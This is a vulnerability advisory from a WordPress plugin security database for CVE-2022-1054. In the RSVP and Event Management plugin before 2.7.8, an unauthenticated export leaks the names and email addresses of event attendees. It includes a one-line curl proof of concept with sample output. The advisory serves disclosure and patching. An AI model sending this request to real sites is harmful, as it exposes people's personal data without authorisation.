WordPress Plugin Vulnerabilities

RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export

Description

The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events

Proof of Concept

curl "https://example.com/wp-admin/admin.php?page=rsvp-admin-export"

"First Name","Last Name","Email","RSVP Status","Kids Meal","Associated Attendees","Vegetarian","Note","Additional Attendee","pre-fill URL"
"test","test","secret@example.com","Yes","N","","N","","N",""

Affects Plugins

Plugin icon
rsvp
Fixed in 2.7.8

References

CVE
CVE-2022-1054

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
95a5fad1-e823-4571-8640-19bf5436578d

Timeline

Publicly Published
2022-03-28 (about 2 years ago)
Added
2022-03-28 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2024-04-05
Title
Flexible Checkout Fields for WooCommerce < 4.1.3 - Missing Authorization
Published
2024-04-22
Title
Advanced Local Pickup for WooCommerce < 1.6.2 - Missing Authorization to Notice Dismissal
Published
2022-11-18
Title
Plugin for Google Reviews < 2.2.3 - Subscriber+ Widget Creation
Published
2024-03-28
Title
BEAR < 1.1.4.4 - Missing Authorization
Published
2024-01-10
Title
POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API